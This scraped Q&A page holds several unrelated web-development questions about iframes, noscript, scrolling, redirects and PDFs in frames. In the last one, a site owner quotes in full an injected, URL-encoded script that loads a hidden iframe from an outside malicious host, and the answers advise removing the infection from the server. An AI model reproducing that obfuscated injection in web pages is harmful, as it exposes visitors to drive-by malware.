I am using an iframe provided by a third party company (due to what our business is, it's either pay for an iframe, or pay for them to build a website, and the iframe was better suited for what we need) However, there are certain things that we can't do with the iframe, which would be useful. However, as it's things which are temporary, and cost a few hundred £ each time we want to change anything, it would be better if we could access it via the parent page, which contains the iframe.
For example, we have a form in the iframe which defaults to a certain product (depending on the page) you are on, however you can search for others. However, for some products we don't currently deal with them, so it would be nice to be able to have an alert box which pops up on the main page, which tells the user we don't deal with this.
For example, if in someone types "Swimming Party" we could have a message pop up that says "Sorry, we currently can't offer any swimming parties, however if you call NUMBER we will book one for you as soon as possible"
And also, if someone types in we would be able to capitalize the first letter if someone put the name as "steve" and not "Steve" (for example)
Sorry if this isn't very descriptive of what we need, but we've never really had to deal with an issue like this, however, the limitations imposed mean we have to look for a simple sounding solution to a much more complex problem.
Try contentDocument or contentWindow.document. The mockup below works for me. Some notes:
1) You have to wait for the whole document to be loaded, i had a tiny bit of trouble with selecting the iframe before the content was loaded. If you sue jquery, this won't be a problem. ;)
2) If the contents of the iframe are cross domain, you'll have to inject some script into the iframe to extract the html nodes you're interested in.
Main Page
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>Main</title>
</head>
<body id="mainbody">
<div>MAIN</div>
<iframe id="myFrame" src="test_3.html"></iframe>
<script src="test.js"></script>
</body>
</html>
Iframe Page
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>Inner</title>
</head>
<body id="iframebody"><div id="nameDiv">MY NAME</div></body>
</html>
Script
document.body.onload = function() {
document.querySelector('#myFrame').contentDocument.querySelector('#nameDiv').textContent = 'NEW NAME';
};
Related
I am having a huge problem. I need to prevent access to non javascript users for a page on my website. I am not very technical when it comes to websites, hmtl or java ect. But I have a page that i would like non javascript users to not be able to access. I have tried lots of code from here in my header and footer such as
<noscript>
<meta http-equiv="refresh" content="0; URL=nojs/index.php">
</noscript>
but it does not work.
To put this into more detail my problem is that a host a webpage with a list of download links. There is an app (web browser) for amazon devices (android) that accesses webpages and allows you to download but it comes with javascript disabled by default.
This means that my Ads dont show and i am now getting 40TB a month bandwidth usage from people using this software which means i may have to pull the site soon as it costs more to run than the ads give back.
I think i need to either block non javascript users. Or is there a way i can make my links on that page in javascript so that none javascript users cant see or use them?
In an ideal world i would just like to display a message saying please enable javascript in settings but i have tried many header codes with no success. Any help here greatly appreciated
I tried using the meta tag inside the noscript tags like you did, and it worked fine for me. Try using an absolute link to your nojs page instead of the relative one you have. I don't know of a way to completely block nonjs users. Another option would be to use the noscript tags to hide the content of your html pages when js is disabled. This won't completely disable nonjs users from seeing your pages since if they are tech-savy they could use inspect-element to unhide the page content, but for the most part it should do a good job of preventing nonjs users from viewing your page. You can also include a no script alert. For example:
<!DOCTYPE html>
<html>
<head>
<title>
</title>
<noscript>
<style>
div.content {
display: none;
}
</style>
</noscript>
</head>
<body>
<noscript>
Please enable Javascript to view this Page
</noscript>
<div class=content>
Page Content Here
</div>
</body>
</html>
I want all my webpages to open at a specific scroll point (scrolled to, let's say, 300px).
I don't want this kind of Javascript solution <body onLoad="window.scroll(0, 150)"> because it's really annoying for the users. In effect, it scrolls only when the page is loaded which means sometimes (if the page loads slowly) it might scrolls many seconds after the page is opened, when the user already started reading the content.
I dont want to change my urls, like in this CSS solution mywebsite.com#scrolldiv
Actually the CSS solution mywebsite.com#scrolldiv works like charm, but it changes my urls, which i don't want.
Is there a way to use the Javascript solution and scroll BEFORE the page is loaded and the content is displayed? I don't want the users to see the annoying automatic scrolling.
Is there a way to use the CSS solution without changing the URLS?
this solution works for your requirements,
the user won't have to wait for load, and there is no url change required:
https://stackoverflow.com/a/22764622/2423221
Just put the script at the end of the html file. Then it will be called as soon as the dom is ready.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Document</title>
</head>
<body>
<!-- other content
(__)
(oo)
/------\/
/ | ||
* /\---/\
~~ ~~
/other content -->
<script type="text/javascript">
window.scrollTo(0,150);
</script>
</body>
</html>
I'm developing in PHP, using Curl to follow links to their final destination. I occasionally reach a page with a meta tag redirection or a javascript redirection, and want to be smart enough to follow them. If a page has both, which should I follow (i.e., which would fire first)?
Sample meta tag refresh:
<meta http-equiv="refresh" content="0;URL='http://location1.com/'">
Sample javascript refresh:
<script>
window.location.href='http://location2.com/';
</script>
Just created this file ( let's call it test.html )
<html>
<head>
<meta http-equiv="refresh" content="0;URL='http://location1.com/'">
<script type="text/javascript">
window.location.href='http://location2.com/';
</script>
</head>
<body>
Hello
</body>
</html>
You can copy and save it. Once you open it, you'll be directed to http://location2.com
Do note that if the <script> tag is not in the <head> tag, the <meta> tag gets executed first.
Hexblot's answer is a good idea -- just try it out if you want to see what happens. However, when I did try it out, Chrome went to location2, and IE went to location1. So it seems to be implementation dependent. You might want to have this be a configurable option on your script. In practice, though, any site that has one redirect in a meta tag and a different one in a script, is (a) unlikely, and (b) not coded very well, as they have no idea where you'll end up.
I don't think there is a good way to detect which one would fire first.
The meta tag has the content attribute which can be used to specify a timeout. However, in JavaScript it is nearly impossible to detect when the redirect will happen as there are infinite ways to write it. At least not without executing it. Example:
var t = 100;
setTimeout(function () {
window.location.href='http://location2.com/';
}, t * 2);
One way by which we can call a pdf inside a frame is by directly seeting the src property..
<frame src="xyz.pdf" .../>
Is there any other way (apart from frame/object/embed) to call the pdf within the frame...something like the frame actually has some html code and within that pdf is called...
I know sounds a bit funny, but is there any way...I need this as I am trying to fix a scrolling issue for pdf within a frame for iPad?
Thank you.
First of all, avoid frames when you can. It's always bad practice.
Here is the source for a very simple HTML page that would redirect to the PDF after one second:
<html>
<head>
<meta http-equiv="refresh" content="1;url=xyz.pdf">
</head>
<body>
</body>
</html>
I don't understand how this would solve your scrolling issue, but it will definitely do what you ask for in your question.
The server that has my website on it also has a virus on it.
The virus injects the malicious code
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script>
onto EVERY single page which is served, and it is being preprocessed by Apache or something similar to add it to the end of the file.
I created a test file, with the following code:
<html>
<head>
<title>Test HTML File</title>
</head>
<body>
<h1>Test HTML File</h1>
</body>
</html>
It isn't pretty, but it served its purpose.
When viewing the page in my browser, I get
<html>
<head>
<title>Test HTML File</title>
</head>
<body>
<h1>Test HTML File</h1>
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script>
</body>
</html>
which can be viewed from www.sagamountain.com/testfile.html (warning, this page is infected)
I need to programmatically stop that div and that script from executing, as it is an iframe to a site with a trojan on it. HTML, CSS, or JS, I just need some way to prevent that JS from executing.
It is already display:none so you cannot see it, but how can I prevent the iframe from ever loading at all?
Thanks for the help! The unescape thing resolves to an iframe to http://ncccnnnc.cn/img/index.php which is clearly the source of my troubles. Don't go to that site!
EDIT: This is a followup to https://serverfault.com/questions/78439/my-website-is-infected-i-restored-a-backup-of-the-uninfected-files-how-long-wil/78459#78459
I'm sorry that I can't answer your specific question, but I think that you're looking at this the wrong way. What you need to do is not strip out the virus-inserted html, what you need to do is talk to your web-host/sysadmin and strip out the virus.
Treating the symptoms won't cure the infection. Treating the disease, however, will also treat the symptoms as well as removing the virus.
The file that is in your server is a php file look in the comments here.
Cyber, if you have to wait on the server to be fixed by someone else, I'd say you should try ending your documents with an open <noscript> tag or open HTML comment tag.
You can't use Javascript to stop content that hasn't been rendered from doing so, unless you use document.write and one of the above tags (noscript/comment). Also you can't do anything by placing a script after, as it is already too late (the content is there already).
It is an ugly solution but should prevent your site visitors from experiencing the virus. It also makes your markup invalid, but any browser should be able to parse it and render it as you expect.
Best of luck with the server!